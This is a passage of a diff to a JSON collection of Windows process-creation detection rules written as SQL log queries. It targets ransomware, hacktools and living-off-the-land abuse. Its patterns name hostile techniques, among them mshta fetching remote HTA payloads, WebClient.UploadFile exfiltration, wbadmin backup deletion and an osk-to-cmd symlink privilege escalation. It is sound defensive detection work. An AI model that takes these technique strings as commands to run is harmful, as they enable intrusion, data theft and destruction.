"experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution", - "attack.reconnaissance", "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.t1614.001" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", + "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.defense_evasion", + "attack.t1059.005", + "attack.t1059.001", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Microsoft SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", - "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Baby Shark Malware Activity", + "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "status": "test", + "description": "Detects activity that could be related to Baby Shark malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.defense_evasion", + "attack.discovery", + "attack.t1012", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_malware_babyshark.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "Visual Basic Command Line Compiler Usage", + "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", + "status": "test", + "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Utilization of this tool should not be seen in enterprise environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious Atbroker Execution", + "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Atbroker executing non-deafualt Assistive Technology applications", + "author": "Mateusz Wydra, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate, non-default assistive technology applications execution" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_lolbin_susp_atbroker.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Shell32 DLL Execution in Suspicious Directory", + "id": "32b96012-7892-429e-b26c-ac2bf46066ff", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "ShimCache Flush", + "id": "b0524451-19af-4efa-a46f-562a977f792e", + "status": "stable", + "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + }, + { + "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", + "id": "e9b61244-893f-427c-b287-3e708f321c6b", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.credential_access", + "attack.t1546.008" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "7Zip Compressing Dump Files", + "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "title": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", + "id": "75578840-9526-4b2a-9462-af469a45e767", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%whoami%' ESCAPE '\\' AND ((CommandLine LIKE '%./Client/Common/%' ESCAPE '\\' OR CommandLine LIKE '%.\\\\Client\\\\Common\\\\%' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\Serv-U.bat%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_exploit_cve_2021_35211_servu.yml" }, { - "title": "Suspicious MSHTA Child Process", - "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "title": "Conti Volume Shadow Listing", + "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "status": "test", - "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", - "author": "Michael Haag", + "description": "Detects a command used by conti to find volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" + "attack.t1587.001", + "attack.resource_development" ], "falsepositives": [ - "Printer software / driver installations", - "HP software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_susp_child_processes.yml" + "filename": "proc_creation_win_malware_conti.yml" }, { - "title": "Possible Shim Database Persistence via sdbinst.exe", - "id": "517490a7-115a-48c6-8862-1a481504d5a8", - "status": "test", - "description": "Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications.", - "author": "Markus Neis", + "title": "Rorschach Ransomware Execution Activity", + "id": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68", + "status": "experimental", + "description": "Detects Rorschach ransomware execution activity", + "author": "X__Junior (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.011" + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dashost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\defrag.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dwm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR NewProcessName LIKE 